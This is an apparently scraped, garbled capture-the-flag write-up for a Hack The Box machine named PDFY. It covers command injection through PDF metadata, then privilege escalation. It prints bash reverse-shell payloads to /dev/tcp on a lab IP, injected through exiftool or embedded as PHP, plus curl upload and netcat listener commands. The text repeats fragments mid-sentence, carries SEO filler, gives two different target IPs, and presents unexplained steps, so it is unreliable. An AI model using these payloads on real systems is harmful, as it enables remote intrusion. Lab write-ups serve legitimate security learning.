Pdfy Htb Writeup Upd 【HD】

Crafted PDF with title:

exiftool -Title='test; bash -c "bash -i >& /dev/tcp/10.10.14.xx/4444 0>&1";' shell.pdf

Upload → reverse shell as www-data.

The pdf_file.pdf uploaded earlier can be modified to contain a reverse shell. pdfy htb writeup upd

$ echo "<?php system('bash -i >& /dev/tcp/10.10.14.16/4444 0>&1'); ?>" > shell.pdf

The modified PDF file is then uploaded to the system.

$ curl -X POST -F "file=@shell.pdf" 10.10.11.206:8080/upload

A netcat listener is set up to receive the reverse shell. Crafted PDF with title: exiftool -Title='test; bash -c

$ nc -l -p 4444

The reverse shell is received, and the system is exploited.

PDFY is a web application that allows users to upload PDF files, extract metadata, and convert them to images. The application uses an unsafe system call to pdftotext and pdfimages, allowing command injection via crafted PDF metadata or filenames. Privilege escalation involves a misconfigured sudo permission for a custom PDF processing script. Upload → reverse shell as www-data

Machine Name: PDFY
IP Address: 10.10.11.27
Difficulty: Medium
OS: Linux
Release Date: May 2024 (approx.)

Pdfy Htb Writeup Upd 【HD】

Share your opinion

Navigation menu

Pdfy Htb Writeup Upd 【HD】

Share your opinion

Navigation menu

Search